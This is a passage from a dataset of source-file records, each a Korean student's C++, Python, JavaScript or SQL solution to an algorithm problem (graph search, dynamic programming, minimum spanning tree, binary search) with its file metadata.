tc, input;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n ans.clear();\n for(int j = 0 ; j < r ; j++) dpArr[j] = 0;\n\n cin >> input; // 1부터 n까지의 정수들\n\n n = 3; // + - 공백\n r = input - 1; // 연산자 개수\n\n duplicatePermutation(0); // 중복 순열\n\n sort(ans.begin(), ans.end()); // ASCII 순서에 따라 출력\n for(int j = 0 ; j < ans.size() ; j++) cout << ans[j] << \"\\n\";\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.44594594836235046, "alphanum_fraction": 0.4797297418117523, "avg_line_length": 14.028985977172852, "blob_id": "ceacfca307fbecda5d189582ef6eca34c9bb8972", "content_id": "b0387a6fb0da42ad9f05b9ad88bdc67dd168902e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1040, "license_type": "no_license", "max_line_length": 55, "num_lines": 69, "path": "/BOJ/BFS_DFS/1260.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*BOJ 1260번: DFS와 BFS\nDATE: 2021-05-19\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\n\nusing namespace std;\nint arr[MAX][MAX];\nbool visited[MAX] = { false, };\nint n, m, v;\n\nvoid dfs(int node) {\n\tvisited[node] = true;\n\tcout << node << \" \"; \n\n\tfor (int i = 1 ; i <= n ; i++) {\n\t\tif (arr[node][i] == 1 && visited[i] == false) { \n\t\t\tdfs(i); \n\t\t}\n\t}\n}\n\nvoid bfs(int node) {\n\tqueue <int> q;\n \n\tq.push(node); \n\tvisited[node] = true; \n\n\tcout << node << \" \"; \n\n\twhile (!q.empty()) { \n int front = q.front(); \n\t\tq.pop();\n\n\t\tfor (int i = 1; i <= n; i++) {\n\t\t\tif (arr[front][i] == 1 && visited[i] == false) {\n\t\t\t\tq.push(i);\n\t\t\t\tvisited[i] = true;\n\t\t\t\tcout << i << \" \"; \n\t\t\t}\n\t\t}\n\t}\n\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tcin >> n >> m >> v;\n\n\tfor (int i = 0; i < m; i++) { \n\t\tint num1, num2;\n\t\tcin >> num1 >> num2;\n\t\tarr[num1][num2] = arr[num2][num1] = 1;\n\t}\n\n //DFS \n\tdfs(v);\n\tcout << \"\\n\";\n\n\tfor(int i = 0 ; i < MAX ; i++)\n\t\tvisited[i] = { false, };\n\n //BFS \n\t//bfs(v); \n\n\treturn 0;\n}" }, { "alpha_fraction": 0.44732576608657837, "alphanum_fraction": 0.5235008001327515, "avg_line_length": 21.88888931274414, "blob_id": "ac291b73a8c4df950d504d9a884396a5a970f949", "content_id": "46d8b372677b9eb979cea17e0ce74a47a458ad12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/BOJ/Dynamic Programming/9251.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9251번: LCS\nDATE: 2021-08-01\nDynamic Programming (Longest Common Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[1001][1001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n string str1, str2;\n cin >> str1 >> str2;\n\n for(int i = 1 ; i <= str2.size() ; i++){\n for(int j = 1 ; j <= str1.size() ; j++){\n if(str2[i-1] == str1[j-1]) dp[i][j] = dp[i-1][j-1] + 1;\n else if(str2[i-1] != str1[j-1]) dp[i][j] = max(dp[i][j-1], dp[i-1][j]);\n }\n }\n\n cout << dp[str2.length()][str1.length()];\n\n return 0;\n}" }, { "alpha_fraction": 0.5469169020652771, "alphanum_fraction": 0.5871313810348511, "avg_line_length": 19.77777862548828, "blob_id": "8b021d9cc40a85135bd20115ff968d14c0f77e5d", "content_id": "bac6ccadff2b3f53e8b248430704b810faa54359", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 427, "license_type": "no_license", "max_line_length": 69, "num_lines": 18, "path": "/programmers/Level 2/camouflage.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 위장\ndate: 2022-02-28\n*/\n#include <vector>\n#include <map>\nusing namespace std;\n\nint solution(vector<vector<string>> clothes) {\n int answer = 1;\n map<string, int> m;\n \n for(vector<string> v : clothes) m[v[1]] += 1;\n \n for(auto i : m) answer *= i.second + 1; // +1: 해당 종류를 입지 않는 경우 추가\n \n return answer - 1; // 아무 옷도 입지 않은 경우 제외\n}" }, { "alpha_fraction": 0.43633952736854553, "alphanum_fraction": 0.45888593792915344, "avg_line_length": 19.95833396911621, "blob_id": "847d61ff3c281d422df24b8696137b96620ed30d", "content_id": "d894a83803352dee974ab4b7dfa64d8ede7c4a4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1514, "license_type": "no_license", "max_line_length": 63, "num_lines": 72, "path": "/programmers/Level 1/failure_rate.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 실패율\n//2019 KAKAO BLIND RECRUITMENT\n//2021-10-04\n#include <iostream>\n#include <algorithm>\n#include <vector>\n#include <map>\nusing namespace std;\n\nbool cmp(pair<double, int>a, pair<double, int>b) {\n \tif (a.first == b.first) {\n\t\treturn a.second < b.second;\n\t}\n\telse {\n\t\treturn a.first > b.first;\n\t}\n \n}\n\nvector<int> solution(int N, vector<int> stages) {\n vector<pair<double, int>> res(N);\n vector<int> answer;\n map<int, int> m;\n int idx = 0, total = stages.size(); \n int max = *max_element(stages.begin(), stages.end());\n\n sort(stages.begin(), stages.end());\n \n for(int i = 1 ; i <= max ; i++) {\n int cnt = 0;\n \n for(int j = idx ; j < stages.size() ; j++) {\n if(stages[j] == i) cnt++;\n else {\n idx = j;\n break;\n }\n }\n\n m.insert({i, cnt});\n }\n \n for(int i = 0 ; i < N ; i++) {\n total -= m[i];\n \n if(total <= 0) {\n res[i] = make_pair(0, i + 1);\n continue;\n }\n \n double num = double(m[i+1]) / total;\n res[i] = make_pair(num, i + 1);\n }\n \n sort(res.begin(), res.end(), cmp);\n \n for(int i = 0 ; i < res.size() ; i++) {\n answer.push_back(res[i].second);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution(5, {2, 1, 2, 6, 2, 4, 3, 3});\n \n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5630885362625122, "alphanum_fraction": 0.5725046992301941, "avg_line_length": 22.130434036254883, "blob_id": "4335651996ef30c57aefbc13365b34302fd96f8a", "content_id": "02fdab540ccb45e2cad8939f21032ffc5faf46be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 539, "license_type": "no_license", "max_line_length": 81, "num_lines": 23, "path": "/programmers/Level 2/the_biggest_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "// programmers Level 2: 가장 큰 수\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nbool cmp(string &a, string &b){\n return a + b > b + a;\n}\n\nstring solution(vector<int> numbers) {\n string answer = \"\";\n vector<string> v;\n \n for(int i = 0 ; i < numbers.size() ; i++) v.push_back(to_string(numbers[i]));\n sort(v.begin(), v.end(), cmp);\n\n for(int i = 0 ; i < v.size() ; i++) answer += v[i];\n answer = answer.front() == '0' ? \"0\" : answer;\n \n return answer;\n}" }, { "alpha_fraction": 0.466292142868042, "alphanum_fraction": 0.49719101190567017, "avg_line_length": 17.763158798217773, "blob_id": "b10e43ecd678df8dfe5721035e4d6d26c316d403", "content_id": "fd58409ed28cb452913363b2a815d9798ffe3d06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 722, "license_type": "no_license", "max_line_length": 69, "num_lines": 38, "path": "/BOJ/Two Pointer/1484.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1484번: 다이어트\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int g;\n cin >> g;\n\n int arr[g];\n int start = 0, end = 0;\n vector<int> ans;\n\n for(int i = 0 ; i < g ; i++) arr[i] = i + 1;\n\n while(end < g) {\n int weight = arr[end] * arr[end] - arr[start] * arr[start];\n\n if(weight == g) ans.push_back(arr[end]);\n\n if(weight < g) end++;\n else start++;\n }\n\n if(ans.empty()) cout << -1;\n else {\n sort(ans.begin(), ans.end());\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5112782120704651, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 21.20833396911621, "blob_id": "d08fa2b984526e45e4885e647c7b70e62d4acd8b", "content_id": "d38d03d549bf79c05735d41f0ee20b7b5107527d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 562, "license_type": "no_license", "max_line_length": 72, "num_lines": 24, "path": "/programmers/Level 2/open_chat_room.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: Open chat room\n2019 KAKAO BLIND RECRUITMENT\n2021-12-21\n*/\nfunction solution(record) {\n const answer = [];\n const user = {};\n\n record.forEach((item) => {\n const [state, uid, nick] = item.split(' ');\n\n if (state !== 'Leave') user[uid] = nick\n })\n\n record.forEach((item) => {\n const [state, uid, nick] = item.split(' ');\n\n if (state === 'Enter') answer.push(`${user[uid]}님이 들어왔습니다.`)\n else if (state === 'Leave') answer.push(`${user[uid]}님이 나갔습니다.`)\n })\n\n return answer;\n}" }, { "alpha_fraction": 0.39094650745391846, "alphanum_fraction": 0.44238683581352234, "avg_line_length": 17.730770111083984, "blob_id": "e3422d7dd997c33bb574869423bcf277fc0ea90a", "content_id": "8e49bb112a4fe50acfa63803e192e199b1a748e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 500, "license_type": "no_license", "max_line_length": 63, "num_lines": 26, "path": "/BOJ/Prefix Sum/11659.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11659번: 구간 합 구하기 4\nDATE: 2022-01-21\nPrefix Sum\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b;\n cin >> n >> m;\n\n int arr[n + 1] = {0, };\n\n for(int i = 1 ; i <= n ; i++) cin >> arr[i];\n for(int i = 1 ; i <= n ; i++) arr[i] = arr[i - 1] + arr[i];\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b;\n cout << arr[b] - arr[a - 1] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3680981695652008, "alphanum_fraction": 0.39614373445510864, "avg_line_length": 19.763635635375977, "blob_id": "4fe2dfb345cf1bb89613d5ed213fc7386e2e1ff2", "content_id": "bc1a8c00d1413daa82b8fc52619c3e938b149e83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1155, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/Graph Theory/2623.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2623번: 음악프로그램\nDATE: 2021-03-04\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int inDegree[n+1] = {0,}, result[n+1];\n vector<int> a[n+1];\n queue<int> q;\n\n for(int i = 0 ; i < m ; i++){\n int num; cin >> num;\n int arr[num];\n for(int j = 0 ; j < num ; j++){\n cin >> arr[j];\n }\n for(int k = 1 ; k < num ; k++){\n a[arr[k-1]].push_back(arr[k]);\n inDegree[arr[k]]++;\n }\n }\n\n for(int i = 1 ; i <= n ; i++){\n if(inDegree[i] == 0) q.push(i);\n }\n\n for(int i = 1 ; i <= n ; i++){\n if(q.empty()){\n cout << 0;\n return 0;\n }\n int front = q.front();\n q.pop();\n result[i] = front;\n for(int i = 0 ; i < a[front].size() ; i++){\n int next = a[front][i];\n if(--inDegree[next] == 0) \n q.push(next);\n }\n }\n//\n for(int i = 1 ; i <= n ; i++){\n cout << result[i] << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42069485783576965, "alphanum_fraction": 0.4478851854801178, "avg_line_length": 20.03174591064453, "blob_id": "e751b907e86a5f64d0f8b7fb4557980fc23094ef", "content_id": "3fb91dc51062bcb39dc8f03040e866681df53b46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1352, "license_type": "no_license", "max_line_length": 69, "num_lines": 63, "path": "/BOJ/BFS_DFS/9177.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9177번: 단어 섞기\nDATE: 2021-09-19\n*/\n#include <iostream>\nusing namespace std;\n\nstring a, b, c;\nint n, a_length, b_length, c_length;\nbool flag;\n\nbool check() {\n int alpha[27] = {0,};\n\n for(int i = 0 ; i < a_length ; i++){\n alpha[a[i] - 'a']++;\n }\n for(int i = 0 ; i < b_length ; i++){\n alpha[b[i] - 'a']++;\n }\n for(int i = 0 ; i < c_length ; i++){\n alpha[c[i] - 'a']--;\n }\n for(int i = 0 ; i < 26 ; i++){\n if(alpha[i] != 0) \n return false;\n }\n\n return true;\n}\n\nvoid backtracking(int a_idx, int b_idx, int c_idx){\n if(flag) {\n return; //이거 안하면 시간초과 (ex a / aba / aaba)\n }\n if(c_idx == c_length) {\n flag = true;\n return;\n }\n\n if(a[a_idx] == c[c_idx]) backtracking(a_idx + 1, b_idx, c_idx+1);\n if(b[b_idx] == c[c_idx]) backtracking(a_idx, b_idx+1, c_idx+1);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n flag = false;\n cin >> a >> b >> c;\n a_length = a.length(); \n b_length = b.length();\n c_length = c.length();\n\n if(check()) backtracking(0, 0, 0);\n \n if(flag) cout << \"Data set \" << i + 1 << \": yes\\n\";\n else cout << \"Data set \" << i + 1 << \": no\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3944866955280304, "alphanum_fraction": 0.42585551738739014, "avg_line_length": 18.5, "blob_id": "b9ef84464d607466fbd3f392a01b7eaf71f0d681", "content_id": "86220f7f3d2e1521069cb225e9c9c6610994a967", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1124, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/BOJ/Binary Search/1477.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1477번: 휴게소 세우기\n2021-12-20\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v;\n int n, m, l, num;\n int start, end, mid, ans = 1000;\n cin >> n >> m >> l;\n\n v.push_back(0);\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n v.push_back(l);\n\n sort(v.begin(), v.end());\n\n start = 1;\n end = l - 1;\n\n while(end >= start) {\n int rest = 0; // 휴게소 개수\n mid = (start + end) / 2;\n\n for(int i = 1 ; i < v.size() ; i++) {\n int dist = v[i] - v[i - 1];\n int cnt = dist / mid; // 두 휴게소 사이에 설치 가능한 휴게소 개수\n\n if(cnt > 0) { // 휴게소 설치 가능\n if(dist % mid == 0) rest += cnt - 1;\n else rest += cnt;\n }\n }\n\n if(rest > m) start = mid + 1;\n else {\n end = mid - 1;\n ans = min(mid, ans);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6053068041801453, "alphanum_fraction": 0.6650083065032959, "avg_line_length": 15.75, "blob_id": "7dbf06adbb5534c4a9610b922dc638797fc92d85", "content_id": "6883bacb77ec99553e8a6f482034b9e66b9cf762", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/programmers/SQL/SUM, MAX, MIN.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# SUM, MAX, MIN\n\n**[1. 최댓값 구하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59415)**\n\n```sql\nSELECT MAX(DATETIME)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[2. 최솟값 구하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59038)**\n\n```sql\nSELECT MIN(DATETIME)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[3. 동물 수 구하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59406)**\n\n```sql\nSELECT COUNT(*)\nFROM ANIMAL_INS\n```\n\n<br/>\n\n**[4. 중복 제거하기 (Level 2)](https://programmers.co.kr/learn/courses/30/lessons/59408)**\n\n```sql\nSELECT COUNT(DISTINCT NAME)\nFROM ANIMAL_INS\nWHERE NAME IS NOT NULL\n```\n" }, { "alpha_fraction": 0.36057692766189575, "alphanum_fraction": 0.40224358439445496, "avg_line_length": 14.625, "blob_id": "c5ebc3cafc0f8a338cf9eb5e94fbabd07af7026c", "content_id": "2c3abd2d2eec2dccf6a1907a2300750f9eba04fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 626, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/BOJ/Mathematics/13251.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13251번: 조약돌 꺼내기\nDATE: 2022-06-28\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, k, sum = 0;\n double ans = 0;\n\n cin >> m;\n \n int arr[m];\n \n for(int i = 0 ; i < m ; i++) {\n cin >> arr[i];\n sum += arr[i];\n }\n\n cin >> k;\n\n for(int i = 0 ; i < m ; i++){\n double a = 1, b = 1;\n\n for(int j = 0 ; j < k ; j++) {\n a *= arr[i] - j;\n b *= sum - j;\n }\n\n ans += (double)a / b;\n }\n\n cout << fixed;\n cout.precision(20);\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.46327683329582214, "alphanum_fraction": 0.48775893449783325, "avg_line_length": 20.260000228881836, "blob_id": "bf4836b75709a009c9b83db9ea16769d83a180ec", "content_id": "0ffd59f5432082adb8f7ec7cc8dfdfceaa43be6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 61, "num_lines": 50, "path": "/BOJ/Two Pointer/2461.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2461번: 대표 선수\nDATE: 2022-01-18\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,int>> total;\n int n, m, input;\n int start, end, diff, classNum = 0;\n int min = 1e9;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> input;\n total.push_back({input, i});\n }\n }\n\n sort(total.begin(), total.end());\n\n start = 0; end = 0;\n vector<int> check(n);\n\n while(end < n * m) {\n // 한 반에서 한 명씩 선발될 때까지 end 증가\n if(check[total[end].second] == 0) classNum++;\n check[total[end].second]++;\n end++;\n\n while(classNum == n){ \n diff = total[end - 1].first - total[start].first;\n if(diff < min) min = diff;\n \n check[total[start].second]--;\n if(check[total[start].second] == 0) classNum--;\n start++;\n }\n }\n\n cout << min;\n\n return 0;\n}" }, { "alpha_fraction": 0.34694793820381165, "alphanum_fraction": 0.36849191784858704, "avg_line_length": 22.712766647338867, "blob_id": "7d016c9f2eed355a1a1fde5077bd50e4affdc21e", "content_id": "6eb8efaa226b3d228544abd0a535c560f7d023d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 134, "num_lines": 94, "path": "/programmers/Level 2/open_chat_room.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "//programmers Level 2 : Open chat room\n//2019 KAKAO BLIND RECRUITMENT\n//2021-05-27\n#include <string>\n#include <vector>\n#include <map>\n#include <iostream>\nusing namespace std;\n\nvector<string> solution(vector<string> record) {\n vector<string> answer;\n map<string, string> m;\n string tmp, command, id, name, str;\n int cnt=0;\n \n for(int i = 0 ; i < record.size() ; i++){\n for(int j = 0 ; j < record[i].length() ; j++){\n if(record[i][j] == ' '){\n if(cnt == 0)\n command = tmp;\n else if(cnt == 1)\n id = tmp;\n \n cnt++;\n tmp = \"\";\n }\n else{\n tmp += record[i][j];\n }\n\n if(j == record[i].length() - 1){\n name = tmp;\n tmp = \"\";\n }\n }\n cnt = 0;\n\n if(command == \"Leave\")\n continue;\n \n m[id] = name;\n }\n\n for(int i = 0 ; i < record.size() ; i++){\n for(int j = 0 ; j < record[i].length() ; j++){\n if(record[i][j] == ' '){\n if(cnt == 0)\n command = tmp;\n else if(cnt == 1)\n id = tmp;\n \n cnt++;\n tmp = \"\";\n }\n else{\n tmp += record[i][j];\n }\n\n if(j == record[i].length() - 1){\n if(command == \"Leave\")\n id = tmp;\n else\n name = tmp;\n \n tmp = \"\";\n }\n }\n \n cnt = 0;\n\n if(command == \"Enter\"){\n str = m[id] + \"님이 들어왔습니다.\";\n answer.push_back(str);\n }\n else if(command == \"Leave\"){\n str = m[id] + \"님이 나갔습니다.\";\n answer.push_back(str);\n }\n \n }\n \n return answer;\n}\n\nint main(){\n vector<string> record = {\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"};\n vector<string> answer = solution(record);\n\n for(int i = 0 ; i < answer.size() ; i++){\n cout << answer[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4522058963775635, "alphanum_fraction": 0.4742647111415863, "avg_line_length": 17.90277862548828, "blob_id": "0f48290bfccd529945d7044152b50ec93a61f36d", "content_id": "906cb70c18350b244faf17bf1725cda723bb084e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/6497.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 6497번: 전력난\n2022-01-04\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 200001\nusing namespace std;\n\nint parent[MAX];\nvector<pair<int,pair<int,int>>> edge;\n\nint getParent(int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, n;\n int x, y, z;\n\n while(1){\n cin >> m >> n;\n if(!m && !n) break;\n\n int sum = 0, ans = 0;\n\n edge.clear();\n for(int i = 1 ; i <= m ; i++) parent[i] = i;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> x >> y >> z;\n edge.push_back({z, {x, y}});\n sum += z;\n }\n\n sort(edge.begin(), edge.end());\n\n for(int i = 0 ; i < edge.size() ; i++){\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(findParent(x, y)) continue;\n unionParent(x, y);\n ans += z;\n }\n\n cout << sum - ans << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.47214484214782715, "alphanum_fraction": 0.4930362105369568, "avg_line_length": 18.95833396911621, "blob_id": "28bea1bac442e717c3b6ea8e4e6d4fc4bc5111e0", "content_id": "d1db20d3bc93e3a097b5b6d495e7af24c8cca801", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1518, "license_type": "no_license", "max_line_length": 58, "num_lines": 72, "path": "/BOJ/MST/1368.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1368번: 물대기\nDATE: 2022-02-11\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 301\nusing namespace std;\n\nvector<pair<int,pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, input, ans = 0;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++) {\n cin >> input; // i번째 논에 우물을 팔 때 드는 비용\n edge.push_back({input, {0, i}}); // 0번 노드: 가상 노드\n }\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n cin >> input; // i번째 논과 j번째 논을 연결하는데 드는 비용\n if(input == 0) continue;\n edge.push_back({input, {i, j}});\n }\n }\n\n for(int i = 0 ; i <= n ; i++) parent[i] = i;\n\n sort(edge.begin(), edge.end());\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int x = edge[i].second.first;\n int y = edge[i].second.second;\n int z = edge[i].first;\n\n if(!findParent(x, y)) {\n unionParent(x, y);\n ans += z;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3570391833782196, "alphanum_fraction": 0.41219156980514526, "avg_line_length": 18.16666603088379, "blob_id": "d2eaf82b967fa27e4bedd7b8065b9db63511007c", "content_id": "6be3db562cdce3dbcd0707bcb18e7ead89dd2acd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 751, "license_type": "no_license", "max_line_length": 72, "num_lines": 36, "path": "/BOJ/Dynamic Programming/12865.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 12865번: 평범한 배낭\nDATE: 2021-02-01\nDynamic Programming\n*/\n#include <iostream>\n\nusing namespace std;\nint arr[101][100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n int n, k;\n cin >> n >> k;\n \n int w[101], v[101];\n\n for(int i = 1 ; i <= n ; i++){\n cin >> w[i] >> v[i];\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= k ; j++){\n if(w[i] > j) //기존의 최대 가치 유지\n arr[i][j] = arr[i-1][j]; \n else{ //(i번째 물건을 담을 때, 담지 않을 때) max 값 선택\n arr[i][j] = max(v[i] + arr[i-1][j - w[i]], arr[i-1][j]);\n }\n }\n }\n\n cout << arr[n][k];\n\n return 0;\n}" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5352941155433655, "avg_line_length": 21.733333587646484, "blob_id": "1a26e95777b36efe918b3626148b308fc0e34398", "content_id": "b40ba42ee8bef77730eda14b6aeeb1acb264dddc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/programmers/Level 2/phone_book.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 2: 전화번호 목록\n# date: 2022-06-11\ndef solution(phone_book):\n answer = True\n \n phone_book.sort()\n str = phone_book[0]\n \n for i in range(1, len(phone_book)):\n if str == phone_book[i][0:len(str)]:\n answer = False\n break\n else: str = phone_book[i]\n \n return answer" }, { "alpha_fraction": 0.4039735198020935, "alphanum_fraction": 0.43841060996055603, "avg_line_length": 16.18181800842285, "blob_id": "92af69fa9a8f9ad904fe2fa3f903b6140eae2ab3", "content_id": "b2d405bd7e0c9894f53fbe5f45f75ce7950744eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 767, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Binary Search/1654.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1654번: 랜선 자르기 \nDATE: 2021-03-23\nBinary Search\n*/\n#include <iostream>\n#define MAX \nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, n;\n long long start, end, mid, sum=0, total, max=-1;\n cin >> k >> n;\n\n int length[k];\n\n for(int i = 0 ; i < k ; i++){\n cin >> length[i];\n sum += length[i];\n }\n\n start = 1;\n end = sum / n; \n\n while(end - start >= 0){\n total = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < k ; i++){\n total += length[i] / mid;\n }\n\n if(total >= n){\n start = mid + 1;\n if(mid > max) max = mid;\n }\n else end = mid - 1;\n }\n\n cout << max;\n\n return 0;\n}" }, { "alpha_fraction": 0.3827160596847534, "alphanum_fraction": 